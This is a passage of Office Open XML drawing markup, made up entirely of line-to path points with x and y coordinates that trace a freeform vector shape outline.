                      <a:pt x="236" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="338" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="349"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="349"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="497"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="466"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
